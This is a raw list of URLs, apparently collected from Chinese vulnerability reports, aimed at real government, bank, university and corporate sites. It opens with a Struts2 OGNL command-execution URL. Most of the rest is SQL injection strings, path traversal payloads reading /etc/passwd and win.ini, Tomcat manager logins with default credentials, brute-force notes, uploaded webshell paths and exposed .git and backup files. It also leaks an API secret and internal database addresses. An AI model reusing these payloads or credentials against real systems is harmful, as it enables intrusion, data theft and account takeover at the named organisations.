http://219.141.18.50/bmxt/person/method/login/login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ipconfig%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://219.141.18.58/WebReport/ReportServer?op=resource&resource=../../WEB-INF/web.xml http://219.141.18.58/cmsweb-portlet/html/adminstatistics/statistics.jsp http://219.141.18.58/cmsweb-portlet/html/common/urlTest.jsp http://219.141.18.58/cmsweb-portlet http://www.ztehome.com.cn/,存在搜索SQL注入,前两天爆出了该站的一个注入问题,后来测试发现转义,但是在别的地方又有同样的问题,存在问题的地方: http://www.ztehome.com.cn/support/siteSearchRslt.php?tsearch=1 http://www.ztehome.com.cn/support/siteSearchRslt.php?tsearch=1 http://202.199.128.120/admin登陆,随便找个学生账号就好,学生账号是学生的学号,密码也是学号,只要随便找个学生的学号登陆就好,我随便找个学号:1101050113。 http://202.199.128.120/admin/sysuser.do?method=list,如图: http://bit.tcl.com/ http://112.124.4.229:808/member/my.php?mid=21&status=4 http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F_f%3D185659aff8c4e814a5d3537d9efb98bf_-_id%3Dwxkj_-_inx%3D0_-_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php_-_query%3D%252526id%25253Dwxkj%252526c%25253D3_-corp%3D http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz www.shuobozhaopin.com/Person/Per_Search_Base.asp gaobu.dgjob.cn/Person/Per_Search_Base.asp www.smrc.com/Person/Per_Search_Base.asp www.jobjp.cn/Person/Per_Search_Base.asp www.0566job.com/Person/Per_Search_Base.asp www.lsrc114.com/Person/Per_Search_Base.asp www.fhclm.com/Person/Per_Search_Base.asp http://math.sjtu.edu.cn/institution/qysd/listit1.php?id=2 http://math.sjtu.edu.cn/institution/qysd/listit1.php?id=-2%20union%20distinct%20select%20concat_ws%28%27:%27,@@datadir,version%28%29%29 site:chinare.gov.cn inurl:file http://www.chinare.gov.cn/table/down.php?file=*.doc http://www.betop-cn.com/data/mysql_error_trace.inc http://qc.legendsec.com/zecmd/zecmd.jsp http://res.njr.so:8000/login.jsp http://www.sipspf.org.cn/person_online/service/EmpInfo/getInfo?uname=00001000&thistype=firstdo http://zzjz2.edong.com/comment/class/index.php?myshownums=30&imageField.x=1&imageField.y=1&mid=&myord=dtime&catid=1&key=555-555-0199@example.com http://www.hawszl.gov.cn/web.rar http://59.252.32.44:8080/IPRCCOA/login_login2.action http://www.xysport.gov.cn/ http://mail.xysport.gov.cn/都是一样的 admin:admin http://114.80.136.111:8003//login.php http://cmri.hiall.com.cn/getMessage.php http://net.chinamobile.com/bbs/faq.php http://lsc.ecnu.edu.cn/admin/editdoc.asp?documentid=1006 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode= http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210396 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741000940603 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210355 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0541001500253 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0641050060004 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741000940683 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0641070360343 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210510 http://xj.vae.ha.cn/1/x/stumain_detail.jsp?editcode=0741001210293 http://exam.chanjet.com/exam/portal/adminStudent!studentlogin.action http://zone.wooyun.org/content/17356 jdbc:oracle:thin:@10.11.68.20:1521:orcl https://member.meizu.com/intl/resetSuc.jsp?type=byemail&userName=FLY账号&useruri=http%3A%2F%2Fmember.meizu.com=(例如https://member.meizu.com/intl/resetSuc.jsp?type=byemail&userName=daynight&useruri=http%3A%2F%2Fmember.meizu.com) http://forum.meizu.com/space.php?uid=1224066 http://forum.meizu.com/member.php?action=list https://member.meizu.com/intl/enterAc.jsp?service=&appuri=&useruri=)只需要输入flyme账号和对应的邮箱即可发链接到邮箱重置密码【中文站是需要选择通过密保问题+邮箱 https://member.meizu.com/intl/emailAddr.jsp?isFlyme=1&userName=Flyme账号@flyme.cn&useruri=http://member.meizu.com),因此可以在第二步遍历邮箱 http://www.elongtian.com/kehuanli/ www.zzrc.cn http://211.100.224.148:7001/newsedit/batman/Login.jsp http://211.100.224.148:7001/newsedit/batman/Login.jsp inurl:cwgkview.aspx?tname= http://60.217.72.17:7081/ckq/cwgkview.aspx?tname=太平镇&CountryName=穆家村 http://123.134.189.60:8007/ckq/cwgkview.aspx?tname=辛庄镇&CountryName=团坡子村 http://nlw.gaoqing.gov.cn:8004/ckq/cwgkview.aspx?tname=田镇办&CountryName=前巩村 http://218.56.99.84:8003/ckq/cwgkview.aspx?tname=西河镇&CountryName=东庄村(张庄) http://222.134.66.54:8014/ckq/cwgkview.aspx?tname=起凤镇&CountryName=鱼一村 http://222.135.109.70:8200/ckq/cwgkview.aspx?tname=开发区&CountryName=林家泊社区 http://218.56.40.229:8041/ckq/cwgkview.aspx?tname=龙港街道&CountryName=庙张村 http://111.17.169.213:801/ckq/cwgkview.aspx?tname=南定镇&CountryName=三泉村 https://open.weixin.qq.com/connect/oauth2/authorize?appid=wxf85ffaf05e3612b6&redirect_uri=http://183.63.133.147/yixin/guagua1/auth4share.jsp?cmd=guagua1Main&response_type=code&scope=snsapi_base&state=STATE#wechat_redirect http://mp.weixin.qq.com/debug/ http://mp.weixin.qq.com/wiki/14/89b871b5466b19b3efa4ada8e577d45e.html https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=wxf85ffaf05e3612b6&secret=a4af06385e73a54fd01ddc706035f547 inurl:Default.aspx?deptid= http://222.135.127.190:7000/Swgk/Default.aspx?deptid=51 http://60.217.72.17:8000/Swgk/Default.aspx?deptid=20 http://61.133.119.187:8089/Swgk/Default.aspx?deptid=48 http://222.135.109.70:8100/Swgk/Default.aspx?&deptid=88 http://123.134.189.60:8012/swgk/default.aspx?deptid=394 http://221.2.149.47:8100/Swgk/Default.aspx?deptid=10 http://nlw.laiwu.gov.cn/swgk/default.aspx?deptid=3947 http://221.2.171.59:8000/Swgk/Default.aspx?deptid=52 http://bjd.tcl.com/activity.aspx?code=0301 http://bjd.tcl.com/Newslist.aspx?code=0401&page=10 http://bjd.tcl.com/Policy.aspx?code=0502 http://bjd.tcl.com/Productsb.aspx?code=0201 http://bjd.tcl.com/contact.aspx?code=0701 http://www.jxrcw.com/gwyWeb/search.aspx?gjz= http://www.aircraft_co.avic.com/listconent.php?cat_id=57&pid=13 http://www.55haitao.com/bbs/thread-934321-1-1.html www.dapu.com http://www.dapu.com http://wan.g.shangdu.com/GameInfo/NewsContent.aspx?newsId=1426 http://sqlmap.org http://www.sino-nz.com http://www.sino-nz.com/ http://www.bjbmc.co http://www.cefa.org.cn http://cx.chinacoop.gov.cn/ http://www.ccoopg.com/ http://city-base.net/ http://mkws.chinasafety.gov.cn/SystemManagement/login/login.aspx http://www.wandoujia.com/apps/com.tixa.lx.help https://github.com/naiyi/JiaodongOnlineNews/blob/master/JiaodongOnlineNews/Classes/JDOAppDelegate.m http://caiyun.feixin.10086.cn/dl/161CSQgcXwNz http://www.zgshfljjh.org/ http://www.zgshfljjh.org/test86.php http://www.cbsqx.gov.cn/)SQL注入漏洞泄露大量信息 http://www.cbsqx.gov.cn/about.php?id=435%27--%20- http://www.cbsqx.gov.cn/about.php?id=435--%20- http://www.bjzz.gov.cn/Article_Class.asp?ClassID=1 http://iczu.zju.edu.cn/zjdxlxszsxt/editor/admin/default.jsp http://zspt.jxvtc.edu.cn:8001/zsxt/editor/admin/default.jsp http://222.180.192.9:8026/zsxt/editor/admin/default.jsp http://zsxt.i.cqut.edu.cn:8008/zsxt/editor/admin/default.jsp http://zs.cqvie.edu.cn:7702/zsxt/editor/admin/default.jsp http://zsgz.ynnu.edu.cn/zsxt/editor/admin/default.jsp http://sfs.starapp.99.com/1.php http://vp.vlinkage.com/passport/login https://open.weixin.qq.com/connect/oauth2/authorize?appid=wx6fa7e3bab7e15415&redirect_uri=https://wxapp.tenpay.com/v2/hybrid/www/weixin/hongbao/receive.shtml?showwxpaytitle=1&sendid=1000000000201501092047478999&channelid=1&msgtype=1&from=singlemessage&isappinstalled=0&us=***********&ver=1&sign=***********&clientversion=26000238&devicetype=android-19&pass_ticket=***********&timeguid=14207873040300.4459930493030697&response_type=code&scope=snsapi_base&state=STATE&connect_redirect=1#wechat_redirect http://www.cjcm.com.cn/ http://www.xcfc.gov.cn/supercms.asp?typeid=12 http://app.info.hc360.com/imbiz/erjishangquana.aspx?e_code=001018 http://app.info.hc360.com/imbiz/erjishangquana.aspx?e_code=001018%20%27%20and%20%27a%27=%27a http://app.info.hc360.com/imbiz/erjishangquana.aspx?e_code=001018%20%27%20and%20%27a%27=%27b http://app.info.hc360.com/imbiz/sanjishangquan.aspx?s_code= http://app.info.hc360.com/imbiz/searchr.aspx?Content=%c0%f1%c6%b7&id=0 http://coolshow.coolyun.com/service/fontdl.php?channel=0&cpid=2928925714&id=292892571 http://www.whfzb.gov.cn/site/upload/apple/800/2.html http://www.hbpp.com.cn/ http://www.hbpp.com.cn/news_info.php?typeid=13&id=764%22 http://www.hbpp.com.cn/news_info.php?typeid=13&id=764 http://210.45.240.15/edoas2/oa.jsp http://beta.cvh.org.cn/dc/w_sp_tree/taxa.php?selected_taxon=351&path=0,1,9,351 http://zabbix.llreader.com/ http://redmine.llreader.com/ xyk.jlu.edu.cn/accountlossList.action?uname=aaaa http://monthly.sinopecnews.com.cn/book/index.htm http://monthly.sinopecnews.com.cn/Usp/?pid=about&act=1 http://www.zsswj.gov.cn/admin/Login.asp http://v.ihaier.com/share/rsp_data/backup/ http://tieba.baidu.com/p/3518361113 http://tieba.baidu.com/p/3518361113 http://pan.baidu.com/share/link?uk=3224675704&shareid=3932337522&fid=1108861696333795 http://mo.gw.com.cn/mo.tar.gz http://chl.yinxunpay.com/login.action http://221.215.38.137:7001/czjm/login.action http://ocean.geodata.cn/Portal/SamplePreview?id=510301-10146 http://tibet.geodata.cn/Portal/SamplePreview?id=100111-10023 http://lake.geodata.cn/Portal/SamplePreview?id=210008-10060 http://159.226.22.201:9010/Portal/SamplePreview?id=100106-10041 http://wdcrre.geodata.cn/Portal/SamplePreview?id=100102-7 http://geospace.geodata.cn/Portal/SamplePreview?id=100107-10020 http://northeast.geodata.cn/Portal/SamplePreview?id=150081-10127 http://61.161.152.98:82/ http://61.161.152.98/ http://gxzol.com/index.php?m=admin&c=index&a=login&pc_hash= http://zsjggw.xnu.edu.cn/getcalendar.aspx?year=2015 http://p.hsort.com/getcalendar.aspx?year=2015 http://dztb.cufe.edu.cn/getcalendar.aspx?year=2015 http://epaper.btwhw.com/getcalendar.aspx?year=2015 http://www.yong-gang.com/getcalendar.aspx?year=2015 http://www.hnxwwy.cn/product_cate.asp?cate_id=1 http://www.hxwuye.com/product_cate.asp?cate_id=5 http://www.blbaoan.com/product_cate.asp?cate_id=1 http://www.myfcba.com/product_cate.asp?cate_id=1 http://www.xpjzbj.com/product_cate.asp?cate_id=5 http://www.wmwy.com.cn/product_cate.asp?cate_id=1 http://www.nnqlfz.com/product_cate.asp?cate_id=1 http://www.xishuizx.com/fytl/product_cate.asp?cate_id=1 http://www.fchgwy.com/product_cate.asp?cate_id=1 http://www.sdlzkt.com/product_cate.asp?cate_id=1 http://www.smxzy.com/product_cate.asp?cate_id=1 http://wmwy.com.cn/product_cate.asp?cate_id=1 http://www.dgygwy.com/product_cate.asp?cate_id=1 http://www.hwbaoan.com/xinfgs/heze/product_cate.asp?cate_id=1 http://www.gzdexin.cn/product_cate.asp?cate_id=1 http://www.oceanglory.com/product_cate.asp?cate_id=1 http://www.kshcwy.com/product_cate.asp?cate_id=1 http://www.lygybwy.net/product_cate.asp?cate_id=1 http://123.233.240.91/index.do?dbsql=mysql http://bm.scs.gov.cn/2015/UserControl/Student/GradeQuery.aspx http://www.zzss.com/ http://**.**.**.**/net_zx.php?id=4 http://**.**.**.**/product_show.php?id=2 http://211.103.171.25/ http://zzb.whu.edu.cn/e/admin/,虽然不是什么标准的弱口令,但我还是猜出来了,你们猜猜看。 http://zzb.whu.edu.cn/e/admin/db/LoadInM.php,这里可以传后缀.mod的文件,建一个文件写入 http://auto.so.ku6.com:80/api/search.htm?q=%E7%A2%B0%E6%92%9E%20%E6%B5%8B%E8%AF%95&status=21&userid=22479334&quality=&duration=&order=1&offset=0&size=9&cb=jsonp1420817762131&redirect:xxx${13579246-1 https://github.com/fringzhao/MyGit/blob/994f5c1bb0b39606ebd8e4db540f74bc7d4547dd/Java/importData/DomainApply/src/com/hexun/web/util/mail/.svn/text-base/MailTest.java.svn-base http://www.cccb.cn/front/main.action?des=10&method=view&tranCode=240002&tranType=ajax http://www.cccb.cn/front/main.action http://www.cccb.cn/wooyun.jsp jdbc:oracle:thin:@31.23.36.109:1521:Ep2Web http://111.206.227.125 http://111.206.227.125/etc/sysconfig/network-scripts/ifcfg-eth0 http://www.cartel.tcl.com http://www.weimi.me/.git/config http://top.weimi.me/.git/config http://code.weimi.me/.git/config http://activity.weimi.me/.git/config http://admin.weimi.me/.git/config http://star.weimi.me/.git/config http://star.weimi.me/.git/ http://star.weimi.me/.git/ http://www.qceit.org.cn/certificateSearchList?code=e44 http://www.qceit.org.cn/search/search_all?key=2134 http://bbs.coolpad.com/poll/ http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31 http://bbs.coolpad.com/poll/poll.php?action=viewVoters&id=4&choiceId=31 http://www.wooyun.org/bugs/wooyun-2015-090920/trace/4030b3726978e7b5a30ee6371384c04a http://www.yungangbj.com/飞航通信 http://yungangbj.com/news/云冈信息网 http://220.194.48.137/Login.action http://183.56.145.195/action/front/indexAction_prepareIndex http://183.56.145.195:8085/SCSERC_COMMON/preViewDoc.action http://183.56.145.195:8085/SCSERC_COMMON/data.jsp http://www.51766.com/www2009/newhotel/search.jsp?nj=1&twoclass=1&prov_id=10011 http://www.117go.com/tour/new http://www.jsve.edu.cn/articles/2014/12/30/58119.htm http://js.jsve.edu.cn/jyb-zhongzhi/ http://www.dzjcy.gov.cn/ http://www.dzjcy.gov.cn/gongkai/jilv.php?catid=1 http://www.xfsx.gov.cn http://www.xfsx.gov.cn/LoginValidator_login http://www.xfsx.gov.cn/data.jsp http://www.xfsx.gov.cn/struts/webconsole.html http://www.herongdai.cn/dede/ http://www.zjgwater.gov.cn/book_views.asp?id=34 http://220.191.210.78:8081/kj_project/upload/ http://220.191.210.78:8081/kj_project/upload/upload.jsp?type=bszn http://www.hbav.gov.cn/phpmyadmin/ http://youju.gionee.com/ http://www.xfsx.gov.cn http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk,140117 http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk包含失败 http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../mag/util/download.jsp%00.apk,140117 http://bi.gionee.com/ www.qianxs.com)数据库未授权访问 http://www.qianxs.com ftp://61.147.115.77 https://vpn.telecomjs.com/prx/000/http/localhost/login www.cspro.org)。然后进入“我的信息”——“考生个人信息”页面。 url:http://58.56.128.100:80/manager/html user:admin pass:admin http://www.mgzfj.gov.cn/ http://www.mgzfj.gov.cn/shouye_Admin/,使用域名mgzfj作用户名,以mgzfj生成密码字典,burpsuit暴力破解登陆成功 http://nc.xhlbdc.com/epp/ http://nc.xhlbdc.com url:http://219.149.144.240:80/manager/html user:tomcat pass:tomcat http://mail.neusoft.edu.cn url:http://116.226.242.211:80/manager/html user:tomcat pass:tomcat url:http://116.226.242.211/sm/logout.do user:admin pass:admin http://awtrc.ict.ac.cn/wireless/index_content.php?newid=9 https://223.202.47.147 http://tongji.cmri.cn/misc/ url:http://60.18.248.42:80/manager/html user:tomcat pass:tomcat url:http://60.18.248.70:80/manager/html user:tomcat pass:tomcat url:http://116.255.157.55:80/manager/html user:tomcat pass:tomcat http://rainbow.tootoo.cn:83/playLive?DeviceId=1522 http://42.96.149.190/Menu3/Index url:http://220.191.210.26:80/manager/html user:admin pass:123456 http://202.98.11.111/qmGmamp/login.jsp user:admin pass:admin url:http://202.98.11.111:80/manager/html user:tomcat pass:tomcat http://www.spgbjy.gov.cn/ http://www.spgbjy.gov.cn//gbjy/xqdc/admin/index.asp,使用SQL注入登陆后台 url:http://219.138.224.95:80/manager/html user:admin url:http://219.148.7.4:80/manager/html user:admin pass:123 http://117.40.186.185:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://wssp.jdz.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://xzsp.jxgc.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://117.40.187.175:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://xzsp.jxyanshan.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://www.jaspw.gov.cn/outportal/transactlist/searchtransactlist.jsp?applysubject= http://117.40.188.34:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://111.75.198.33:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://117.40.131.172:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= http://111.75.198.33:8008/outportal/transactlist/searchtransactlist.jsp?applysubject= url:http://58.211.238.57:80/manager/html user:admin pass:admin url:http://122.141.250.103:80/manager/html user:admin pass:admin http://211.80.224.35/StationWeb/pages/common/frameset.jsp http://211.80.224.35/jmx-console http://211.80.224.35/cmd1/ http://222.68.17.101/ http://ms.stv.sh.cn/ http://172.27.203.81:8080/ http://172.27.206.226/login/login.php?last_url=http://172.27.206.226/admin/admin.php http://172.27.243.159:8080/login/login.php http://ms.smg.sh.cn/ http://172.27.243.103/e/admin/admin.php http://ms.btc.sh.cn/ ftp://ftp.gx.cn ftp://ftp.yewu.cn https://172.24.201.50 https://172.28.190.68 http://www.qiushibaike.com/login http://218.98.34.166:8090/index.php http://218.98.34.166:8090/index.php http://218.98.34.166:8090/fckeditor/editor/ http://www.spgbjy.gov.cn:20992/index.asp http://www.ncwsj.gov.cn//uploads/1.php http://www.ncwsj.gov.cn//data/config.format.inc.php http://www.ncwsj.gov.cn/uploads/gb.php http://data.dichan.com/MediaDetails.aspx?ItemID=bac542dd-a677-45f5-b665-279a0ce57345 http://cwc.hnust.cn/pay/getpass.asp http://www.51766.com/www2009/dujia/search.jsp?startAdd=10044&prov_id=1004401&linetype=5 http://rrt.m-school.cn jdbc:mysql://192.168.20.105:3306/phpcms_v957?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey6?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt3?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.103:3306/smapp?&useUnicode=true&characterEncoding=gbk&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_statistics?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey4?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt_center?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey5?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt5?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey2?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.103:3306/smapp_backup?&useUnicode=true&characterEncoding=gbk&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi6?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt6?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi4?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt4?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_survey3?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.103:3306/gwapp?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.100:3306/xxt2?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi5?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_att?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi2?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true jdbc:mysql://192.168.20.101:3306/xxt_assi3?&useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull&transformedBitIsBoolean=true http://wooyun.org/bugs/wooyun-2010-066645 https://ssl.e-acic.cn url:http://211.152.43.83:80/manager/html user:admin pass:admin www.956122.com)是一个专注于为驾驶人提供道路交通违法照片查看、自助处罚、在线缴款的专业平台。 ftp://219.238.174.151/ http://www.ltxyt.com/XYT/DX/Paper/PaperInfo.aspx?id=2084 http://www.sqlmap.org www.ltxyt https://github.com/scott2lsb/doc/blob/8f37431fff86f2f3b68031fca65c8e8e842d1f47/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/%5B03%5D%E5%90%88%E4%BD%9C%E6%B8%A0%E9%81%93/%E4%B8%9A%E5%8A%A1%E6%8E%A5%E5%8F%A3/%5B04%5D%E5%B7%B2%E5%AF%B9%E6%8E%A5%E6%B8%A0%E9%81%93/%E6%98%93%E5%AE%9D/%E6%9C%8D%E5%8A%A1%E5%9C%B0%E5%9D%80.txt https://github.com/scott2lsb/client-server http://223.203.195.109:8080/log http://www.51openos.com/ http://www.1ypg.com/ http://www.1ypg.com/admin_back/admin.html http://www.1ypg.com/admin_back/toMailSet.action http://www.1ypg.com/admin_back/toUpdateUser.action?id=1001641331&backUrl=http://www.1ypg.com/admin_back/userListAll.action http://www.1ypg.com/admin_back/payInfo.action?id=alipay http://www.1ypg.com/admin_back/toMessageSet.action http://ffp.scal.com.cn http://ffp.scal.com.cn/FFPNewWeb/Mall/GetList url:http://218.241.155.16:80/manager/html user:tomcat pass:tomcat http://byj.sjtu.edu.cn/web.rar url:http://122.194.12.23:80/manager/html user:tomcat pass:tomcat http://testwap.hexun.com/admin/index.jsp http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test http://testwap.hexun.com/admin/login.jsp?umane=test&pwd=test http://182.50.0.139:8000/pmm/JSP/businessmanage/toZhuCe.action http://www.lfmz.gov.cn/ http://dg.uninx.com/dgpt/shop.php?shopid=5 http://www.sqlmap.org site:lenovo.com inurl:login找到这么一处后台 http://css.lenovo.com/lxymanage/login.php,后台有验证码,不过发现验证码仅仅是js校验的 http://css.lenovo.com/lxymanage/indexindex.php www.517na.com输入账号cs,密码000000进入系统,可以跳到3个分站, http://job.fesco.com.cn/company/Com_ReadBox.asp?param=1%20or%201=1%20and%20--%20 http://jiemu.ifeng.com/Resource/201105/cmd.aspx;.jpg http://jiemu.ifeng.com/Resource/201105/ http://jiemu.ifeng.com/Resource/ http://jiemu.ifeng.com/images/ http://portal.nwsuaf.edu.cn/eapdomain/static/component/cms/cmp_cms_password_find/findPassword.jsp http://portal.nwsuaf.edu.cn/eapdomain/component.shtml?name=cmp_cms_password_find&event=findPersonInfo&account=1234567&callback=stcCallback1026 http://www.51766.com/www2009/ajax/shop_et_ajax.jsp?cust_id=91walk&info_id=1103280648 http://www.51766.com/www2009/dujia/search.jsp?minPrice=0&maxPrice=10000&minDay=0&maxDay=30&inarea=&transfer=&linetype=&startAdd_name=%E5%B9%Bf%E4%B8%9C&to=%E5%B9%BF%E5%B7%9E&start_time=yyyy-mm-dd&end_time=yyyy-mm-dd http://zssj.lib.sjtu.edu.cn/wwwroot.rar http://58.83.202.123/ http://mas.bnu.edu.cn http://mas.bnu.edu.cn/serverLog.do?act=upload&fileName=../../../../../../../../../../etc/passwd http://www.strongsoft.net/ www.xtbank.com http://www.xtbank.com/download/download.jsp?filepath=/site902/uploadfiles/zxgg/1413941582458.xls&filename=1413941582458.xls&ei=Ht2xVLPgGpOnyASX34DACA&usg=AFQjCNGeC93YEDRmk2Km8iyVcBb7iv8VNQ http://www.xtbank.com/download/download.jsp?filepath=download/download.jsp http://www.xtbank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://ebank.pzhccb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://qjccb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.chengdebank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.bankofhld.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.hengshuibank.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.ccqtgb.com/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.bankoffs.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.yxccb.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.ccfccb.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://www.bd-bank.com.cn/download/download.jsp?filepath=../../../../../../../../../../windows/win.ini http://183.64.83.109/hudong/VoteList.aspx http://219.222.244.59:6006/VoteList.aspx http://119.145.248.165:83/VoteList.aspx http://119.146.188.82:83/VoteList.aspx http://kjxyl.gdufs.edu.cn/hudong/VoteList.aspx http://121.32.136.50:701/gz_20141028/guangzhou/20141028/BadwebRemindPage.aspx?param=ABdXNlck5hbWU9MDIweHh4eHh4QDE2My5nZCZzcmNVcmw9d3d3LmJhaWR1LmNvbSZwb2xpY3lJZD0xMzc1JnNyY0lwPTEyNy4wLjAuMSZ0eXBlPTA= http://www.ahknchem.com/kndetailproe.php?id=1 http://www.hongrunchem.net/hongrundetailpro.php?id=1 http://st.guju.com.cn/ IP:203.166.163.201 http://aijianzi.gaosiedu.com/classlist/getClassClassificationList?xb=1 http://www.yile.com/recharge.php?cid=27 http://fwpt.smehlj.gov.cn/omp/search.action http://www.smehlj.gov.cn/omp/search.action http://www.51766.com/admin/shopSelf/seniority.jsp?custclass=6&prov_id=100 http://phed.cqu.edu.cn/eWebEditor/admin/default.asp http://phed.cqu.edu.cn/eWebEditor/admin/upload.asp http://phed.cqu.edu.cn/Edit/UploadFile/20141126133824963.asa http://phed.cqu.edu.cn/images/zu8989sdxk.asa http://bbs.tcl.com/aspcheck.asp http://www.07073.com/plus/jlist.phpid=1294 http://www.07073.com/plus/jlist.phpid=1294 http://dg.uninx.com/ http://dg.uninx.com/dgpt/list.php?searchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian= http://dg.uninx.com/dgpt/list.php inurl:homeLogin.action inurl:homeLogin.action https://ebank.guilinbank.com.cn/jfyMall/default.do http://humanrights.nankai.edu.cn/?m=list&catid=3 http://jggswb.sjz12333.gov.cn:8102/eapdomain/login.do?method=begin 